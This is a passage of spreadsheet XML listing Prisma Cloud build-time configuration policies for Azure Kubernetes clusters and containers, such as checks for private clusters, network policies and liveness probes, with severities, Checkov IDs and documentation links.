      <c r="R1145" t="inlineStr"/>
      <c r="S1145" t="inlineStr"/>
      <c r="T1145" t="b">
        <v>0</v>
      </c>
      <c r="U1145" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1145" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:azure-kubernetes-cluster</t>
        </is>
      </c>
      <c r="W1145" t="inlineStr">
        <is>
          <t>Ensure that only critical system pods run on system nodes</t>
        </is>
      </c>
      <c r="X1145" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-kubernetes-policies/bc-azure-232</t>
        </is>
      </c>
      <c r="Y1145" t="inlineStr"/>
      <c r="Z1145" t="inlineStr">
        <is>
          <t>{"category":"Kubernetes","resourceTypes":["azurerm_kubernetes_cluster"]}</t>
        </is>
      </c>
      <c r="AA1145" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1145" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1145" t="inlineStr">
        <is>
          <t>CKV_AZURE_232</t>
        </is>
      </c>
      <c r="AD1145" t="b">
        <v>1</v>
      </c>
      <c r="AE1145" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1145" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG11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5" t="inlineStr">
        <is>
          <t>80543338-b3a9-4128-b8da-ff20617fa340</t>
        </is>
      </c>
      <c r="AI1145" t="inlineStr"/>
      <c r="AJ1145" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1145" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1146">
      <c r="A1146" t="inlineStr"/>
      <c r="B1146" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1146" s="2" t="inlineStr"/>
      <c r="D1146" t="inlineStr"/>
      <c r="E1146" t="inlineStr"/>
      <c r="F1146" t="inlineStr"/>
      <c r="G1146" t="b">
        <v>1</v>
      </c>
      <c r="H11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6" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J1146" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:azure-kubernetes</t>
        </is>
      </c>
      <c r="K1146" t="inlineStr">
        <is>
          <t>AKS is not enabled for private clusters</t>
        </is>
      </c>
      <c r="L1146" t="inlineStr"/>
      <c r="M1146" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1146" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1146" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1146" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1146" t="inlineStr"/>
      <c r="R1146" t="inlineStr"/>
      <c r="S1146" t="inlineStr"/>
      <c r="T1146" t="b">
        <v>0</v>
      </c>
      <c r="U1146" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1146" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:azure-kubernetes-cluster</t>
        </is>
      </c>
      <c r="W1146" t="inlineStr">
        <is>
          <t>Ensure that AKS enables private clusters</t>
        </is>
      </c>
      <c r="X1146" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-kubernetes-policies/ensure-that-aks-enables-private-clusters</t>
        </is>
      </c>
      <c r="Y1146" t="inlineStr"/>
      <c r="Z1146" t="inlineStr">
        <is>
          <t>{"category":"Kubernetes","resourceTypes":["azurerm_kubernetes_cluster"]}</t>
        </is>
      </c>
      <c r="AA1146" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1146" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1146" t="inlineStr">
        <is>
          <t>CKV_AZURE_115</t>
        </is>
      </c>
      <c r="AD1146" t="b">
        <v>1</v>
      </c>
      <c r="AE1146" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1146" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG11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6" t="inlineStr">
        <is>
          <t>752df2ea-d7a3-4dc6-bac1-ec0a8379e86d</t>
        </is>
      </c>
      <c r="AI1146" t="inlineStr"/>
      <c r="AJ1146" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1146" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1147">
      <c r="A1147" t="inlineStr"/>
      <c r="B1147" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1147" s="2" t="inlineStr"/>
      <c r="D1147" t="inlineStr"/>
      <c r="E1147" t="inlineStr"/>
      <c r="F1147" t="inlineStr"/>
      <c r="G1147" t="b">
        <v>1</v>
      </c>
      <c r="H11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7" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J1147" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:azure-kubernetes</t>
        </is>
      </c>
      <c r="K1147" t="inlineStr">
        <is>
          <t>Operating system disks are not ephemeral disks</t>
        </is>
      </c>
      <c r="L1147" t="inlineStr"/>
      <c r="M1147" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1147" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1147" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1147" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1147" t="inlineStr"/>
      <c r="R1147" t="inlineStr"/>
      <c r="S1147" t="inlineStr"/>
      <c r="T1147" t="b">
        <v>0</v>
      </c>
      <c r="U1147" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1147" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:azure-kubernetes-cluster</t>
        </is>
      </c>
      <c r="W1147" t="inlineStr">
        <is>
          <t>Ensure ephemeral disks are used for OS disks</t>
        </is>
      </c>
      <c r="X1147" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-kubernetes-policies/bc-azure-226</t>
        </is>
      </c>
      <c r="Y1147" t="inlineStr"/>
      <c r="Z1147" t="inlineStr">
        <is>
          <t>{"category":"Kubernetes","resourceTypes":["azurerm_kubernetes_cluster"]}</t>
        </is>
      </c>
      <c r="AA1147" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1147" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1147" t="inlineStr">
        <is>
          <t>CKV_AZURE_226</t>
        </is>
      </c>
      <c r="AD1147" t="b">
        <v>1</v>
      </c>
      <c r="AE1147" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1147" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG11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7" t="inlineStr">
        <is>
          <t>4c01c94c-8a64-4741-8a6f-a79e3ab75bd2</t>
        </is>
      </c>
      <c r="AI1147" t="inlineStr"/>
      <c r="AJ1147" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1147" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1148">
      <c r="A1148" t="inlineStr"/>
      <c r="B1148" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1148" s="2" t="inlineStr"/>
      <c r="D1148" t="inlineStr"/>
      <c r="E1148" t="inlineStr"/>
      <c r="F1148" t="inlineStr"/>
      <c r="G1148" t="b">
        <v>1</v>
      </c>
      <c r="H11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8" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J1148" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:azure-kubernetes</t>
        </is>
      </c>
      <c r="K1148" t="inlineStr">
        <is>
          <t>Azure Kubernetes Cluster (AKS) Nodes Do Not Use Scale Sets</t>
        </is>
      </c>
      <c r="L1148" t="inlineStr"/>
      <c r="M1148" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1148" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1148" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1148" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1148" t="inlineStr"/>
      <c r="R1148" t="inlineStr"/>
      <c r="S1148" t="inlineStr"/>
      <c r="T1148" t="b">
        <v>0</v>
      </c>
      <c r="U1148" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1148" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:azure-kubernetes-cluster</t>
        </is>
      </c>
      <c r="W1148" t="inlineStr">
        <is>
          <t>Ensure Azure Kubernetes Cluster (AKS) nodes use scale sets</t>
        </is>
      </c>
      <c r="X1148" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.paloaltonetworks.com/prisma/prisma-cloud/prisma-cloud-code-security-policy-reference/azure-policies/azure-kubernetes-cluster-policies/azr-kubernetes-cluster-16</t>
        </is>
      </c>
      <c r="Y1148" t="inlineStr"/>
      <c r="Z1148" t="inlineStr">
        <is>
          <t>{"category":"Kubernetes","resourceTypes":["azurerm_kubernetes_cluster"]}</t>
        </is>
      </c>
      <c r="AA1148" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1148" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1148" t="inlineStr">
        <is>
          <t>CKV_AZURE_169</t>
        </is>
      </c>
      <c r="AD1148" t="b">
        <v>1</v>
      </c>
      <c r="AE1148" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1148" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG11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8" t="inlineStr">
        <is>
          <t>40487b20-8a44-4eca-83a2-9c4b122962e2</t>
        </is>
      </c>
      <c r="AI1148" t="inlineStr"/>
      <c r="AJ1148" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1148" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1149">
      <c r="A1149" t="inlineStr"/>
      <c r="B1149" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1149" s="2" t="inlineStr"/>
      <c r="D1149" t="inlineStr"/>
      <c r="E1149" t="inlineStr"/>
      <c r="F1149" t="inlineStr"/>
      <c r="G1149" t="b">
        <v>1</v>
      </c>
      <c r="H11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49" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J1149" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:azure-kubernetes</t>
        </is>
      </c>
      <c r="K1149" t="inlineStr">
        <is>
          <t>Azure AKS cluster network policies are not enforced</t>
        </is>
      </c>
      <c r="L1149" t="inlineStr"/>
      <c r="M1149" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1149" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1149" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1149" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1149" t="inlineStr"/>
      <c r="R1149" t="inlineStr"/>
      <c r="S1149" t="inlineStr"/>
      <c r="T1149" t="b">
        <v>0</v>
      </c>
      <c r="U1149" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1149" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:azure-kubernetes-cluster</t>
        </is>
      </c>
      <c r="W1149" t="inlineStr">
        <is>
          <t>Ensure AKS cluster has Network Policy configured</t>
        </is>
      </c>
      <c r="X1149" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-kubernetes-policies/bc-azr-kubernetes-4</t>
        </is>
      </c>
      <c r="Y1149" t="inlineStr"/>
      <c r="Z1149" t="inlineStr">
        <is>
          <t>{"category":"Kubernetes","resourceTypes":["azurerm_kubernetes_cluster"]}</t>
        </is>
      </c>
      <c r="AA1149" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1149" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1149" t="inlineStr">
        <is>
          <t>CKV_AZURE_7</t>
        </is>
      </c>
      <c r="AD1149" t="b">
        <v>1</v>
      </c>
      <c r="AE1149" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1149" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG11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49" t="inlineStr">
        <is>
          <t>61623d0c-5208-48b2-b320-1d6eb284e61d</t>
        </is>
      </c>
      <c r="AI1149" t="inlineStr"/>
      <c r="AJ1149" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1149" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1150">
      <c r="A1150" t="inlineStr"/>
      <c r="B1150" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1150" s="2" t="inlineStr"/>
      <c r="D1150" t="inlineStr"/>
      <c r="E1150" t="inlineStr"/>
      <c r="F1150" t="inlineStr"/>
      <c r="G1150" t="b">
        <v>1</v>
      </c>
      <c r="H11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0" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J1150" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:azure-kubernetes</t>
        </is>
      </c>
      <c r="K1150" t="inlineStr">
        <is>
          <t>AKS does not use Azure policies add-on</t>
        </is>
      </c>
      <c r="L1150" t="inlineStr"/>
      <c r="M1150" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1150" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1150" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1150" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1150" t="inlineStr"/>
      <c r="R1150" t="inlineStr"/>
      <c r="S1150" t="inlineStr"/>
      <c r="T1150" t="b">
        <v>0</v>
      </c>
      <c r="U1150" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1150" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:azure-kubernetes-cluster</t>
        </is>
      </c>
      <c r="W1150" t="inlineStr">
        <is>
          <t>Ensure that AKS uses Azure Policies Add-on</t>
        </is>
      </c>
      <c r="X1150" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-kubernetes-policies/ensure-that-aks-uses-azure-policies-add-on</t>
        </is>
      </c>
      <c r="Y1150" t="inlineStr"/>
      <c r="Z1150" t="inlineStr">
        <is>
          <t>{"category":"Kubernetes","resourceTypes":["azurerm_kubernetes_cluster"]}</t>
        </is>
      </c>
      <c r="AA1150" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1150" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1150" t="inlineStr">
        <is>
          <t>CKV_AZURE_116</t>
        </is>
      </c>
      <c r="AD1150" t="b">
        <v>1</v>
      </c>
      <c r="AE1150" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1150" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG11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0" t="inlineStr">
        <is>
          <t>b09005ec-87f5-47ce-bdff-3480eee73931</t>
        </is>
      </c>
      <c r="AI1150" t="inlineStr"/>
      <c r="AJ1150" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1150" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1151">
      <c r="A1151" t="inlineStr"/>
      <c r="B1151" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1151" s="2" t="inlineStr"/>
      <c r="D1151" t="inlineStr"/>
      <c r="E1151" t="inlineStr"/>
      <c r="F1151" t="inlineStr"/>
      <c r="G1151" t="b">
        <v>1</v>
      </c>
      <c r="H11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1" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J1151" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:azure-kubernetes</t>
        </is>
      </c>
      <c r="K1151" t="inlineStr">
        <is>
          <t>Kubernetes dashboard is not disabled</t>
        </is>
      </c>
      <c r="L1151" t="inlineStr"/>
      <c r="M1151" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1151" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1151" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1151" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1151" t="inlineStr"/>
      <c r="R1151" t="inlineStr"/>
      <c r="S1151" t="inlineStr"/>
      <c r="T1151" t="b">
        <v>0</v>
      </c>
      <c r="U1151" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1151" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:azure-kubernetes-cluster</t>
        </is>
      </c>
      <c r="W1151" t="inlineStr">
        <is>
          <t>Ensure Kube Dashboard is disabled</t>
        </is>
      </c>
      <c r="X1151" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-kubernetes-policies/bc-azr-kubernetes-5</t>
        </is>
      </c>
      <c r="Y1151" t="inlineStr"/>
      <c r="Z1151" t="inlineStr">
        <is>
          <t>{"category":"Kubernetes","resourceTypes":["azurerm_kubernetes_cluster"]}</t>
        </is>
      </c>
      <c r="AA1151" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1151" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1151" t="inlineStr">
        <is>
          <t>CKV_AZURE_8</t>
        </is>
      </c>
      <c r="AD1151" t="b">
        <v>1</v>
      </c>
      <c r="AE1151" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1151" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG11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1" t="inlineStr">
        <is>
          <t>aac73615-2690-46ff-869f-c868e08ac128</t>
        </is>
      </c>
      <c r="AI1151" t="inlineStr"/>
      <c r="AJ1151" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1151" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1152">
      <c r="A1152" t="inlineStr"/>
      <c r="B1152" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1152" s="2" t="inlineStr"/>
      <c r="D1152" t="inlineStr"/>
      <c r="E1152" t="inlineStr"/>
      <c r="F1152" t="inlineStr"/>
      <c r="G1152" t="b">
        <v>1</v>
      </c>
      <c r="H11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2" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J1152" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:azure-kubernetes</t>
        </is>
      </c>
      <c r="K1152" t="inlineStr">
        <is>
          <t>AKS cluster not encrypting temp disks, caches, and data flows</t>
        </is>
      </c>
      <c r="L1152" t="inlineStr"/>
      <c r="M1152" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1152" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1152" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1152" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1152" t="inlineStr"/>
      <c r="R1152" t="inlineStr"/>
      <c r="S1152" t="inlineStr"/>
      <c r="T1152" t="b">
        <v>0</v>
      </c>
      <c r="U1152" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1152" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:azure-kubernetes-cluster,azure-kubernetes-cluster-node-pool</t>
        </is>
      </c>
      <c r="W1152" t="inlineStr">
        <is>
          <t>Ensure that the AKS cluster encrypt temp disks, caches, and data flows</t>
        </is>
      </c>
      <c r="X1152" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-kubernetes-policies/bc-azure-227</t>
        </is>
      </c>
      <c r="Y1152" t="inlineStr"/>
      <c r="Z1152" t="inlineStr">
        <is>
          <t>{"category":"Kubernetes","resourceTypes":["azurerm_kubernetes_cluster","azurerm_kubernetes_cluster_node_pool"]}</t>
        </is>
      </c>
      <c r="AA1152" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1152" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1152" t="inlineStr">
        <is>
          <t>CKV_AZURE_227</t>
        </is>
      </c>
      <c r="AD1152" t="b">
        <v>1</v>
      </c>
      <c r="AE1152" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1152" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG11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2" t="inlineStr">
        <is>
          <t>3947af44-d2bf-4ae3-9d14-3543388a26ec</t>
        </is>
      </c>
      <c r="AI1152" t="inlineStr"/>
      <c r="AJ1152" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1152" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1153">
      <c r="A1153" t="inlineStr"/>
      <c r="B1153" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1153" s="2" t="inlineStr"/>
      <c r="D1153" t="inlineStr"/>
      <c r="E1153" t="inlineStr"/>
      <c r="F1153" t="inlineStr"/>
      <c r="G1153" t="b">
        <v>1</v>
      </c>
      <c r="H11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3" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J1153" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:azure-kubernetes</t>
        </is>
      </c>
      <c r="K1153" t="inlineStr">
        <is>
          <t>Azure Kubernetes Cluster (AKS) Nodes Don't Limit the Maximum Pods to Greater than 50</t>
        </is>
      </c>
      <c r="L1153" t="inlineStr"/>
      <c r="M1153" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1153" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1153" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1153" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1153" t="inlineStr"/>
      <c r="R1153" t="inlineStr"/>
      <c r="S1153" t="inlineStr"/>
      <c r="T1153" t="b">
        <v>0</v>
      </c>
      <c r="U1153" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1153" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:azure-kubernetes-cluster,azure-kubernetes-cluster-node-pool</t>
        </is>
      </c>
      <c r="W1153" t="inlineStr">
        <is>
          <t>Ensure Azure Kubernetes Cluster (AKS) nodes should use a minimum number of 50 pods.</t>
        </is>
      </c>
      <c r="X1153" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.paloaltonetworks.com/prisma/prisma-cloud/prisma-cloud-code-security-policy-reference/azure-policies/azure-kubernetes-policies/azr-kubernetes-cluster-15</t>
        </is>
      </c>
      <c r="Y1153" t="inlineStr"/>
      <c r="Z1153" t="inlineStr">
        <is>
          <t>{"category":"Kubernetes","resourceTypes":["azurerm_kubernetes_cluster","azurerm_kubernetes_cluster_node_pool"]}</t>
        </is>
      </c>
      <c r="AA1153" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1153" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1153" t="inlineStr">
        <is>
          <t>CKV_AZURE_168</t>
        </is>
      </c>
      <c r="AD1153" t="b">
        <v>1</v>
      </c>
      <c r="AE1153" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1153" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG11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3" t="inlineStr">
        <is>
          <t>83b97dbc-8d7f-4b50-a803-2293fccf3dcf</t>
        </is>
      </c>
      <c r="AI1153" t="inlineStr"/>
      <c r="AJ1153" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1153" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1154">
      <c r="A1154" t="inlineStr"/>
      <c r="B1154" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1154" s="2" t="inlineStr"/>
      <c r="D1154" t="inlineStr"/>
      <c r="E1154" t="inlineStr"/>
      <c r="F1154" t="inlineStr"/>
      <c r="G1154" t="b">
        <v>1</v>
      </c>
      <c r="H11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4" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1154" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:containers</t>
        </is>
      </c>
      <c r="K1154" t="inlineStr">
        <is>
          <t>Liveness probe is not configured</t>
        </is>
      </c>
      <c r="L1154" t="inlineStr"/>
      <c r="M1154" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1154" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1154" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1154" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1154" t="inlineStr"/>
      <c r="R1154" t="inlineStr"/>
      <c r="S1154" t="inlineStr"/>
      <c r="T1154" t="b">
        <v>0</v>
      </c>
      <c r="U1154" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1154" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:containers</t>
        </is>
      </c>
      <c r="W1154" t="inlineStr">
        <is>
          <t>Liveness Probe Should be Configured</t>
        </is>
      </c>
      <c r="X1154" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-7</t>
        </is>
      </c>
      <c r="Y1154" t="inlineStr"/>
      <c r="Z1154" t="inlineStr">
        <is>
          <t>{"category":"Kubernetes","resourceTypes":["containers"]}</t>
        </is>
      </c>
      <c r="AA1154" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1154" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1154" t="inlineStr">
        <is>
          <t>CKV_K8S_8</t>
        </is>
      </c>
      <c r="AD1154" t="b">
        <v>1</v>
      </c>
      <c r="AE1154" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1154" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG11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4" t="inlineStr">
        <is>
          <t>0ac8c8e1-3382-43da-90bb-9d4b5b54a624</t>
        </is>
      </c>
      <c r="AI1154" t="inlineStr"/>
      <c r="AJ1154" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1154" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1155">
      <c r="A1155" t="inlineStr"/>
      <c r="B1155" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1155" s="2" t="inlineStr"/>
      <c r="D1155" t="inlineStr"/>
      <c r="E1155" t="inlineStr"/>
      <c r="F1155" t="inlineStr"/>
      <c r="G1155" t="b">
        <v>1</v>
      </c>
      <c r="H11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5" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1155" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:containers</t>
        </is>
      </c>
      <c r="K1155" t="inlineStr">
        <is>
          <t>The --audit-log-maxsize argument is not set appropriately</t>
        </is>
      </c>
      <c r="L1155" t="inlineStr"/>
      <c r="M1155" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1155" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1155" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1155" t="inlineStr">
        <is>
